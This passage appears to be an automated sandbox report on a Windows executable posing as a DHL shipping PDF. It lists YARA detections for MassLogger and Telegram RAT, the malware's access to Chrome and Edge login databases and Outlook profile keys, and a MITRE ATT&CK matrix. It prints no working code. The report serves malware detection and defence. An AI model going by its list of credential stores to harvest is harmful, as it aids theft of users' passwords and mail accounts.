                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		111
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  Input Capture                  		1
                  Process Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)51
                  Virtualization/Sandbox Evasion                  		Security Account Manager51
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object Model1
                  Data from Local System                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.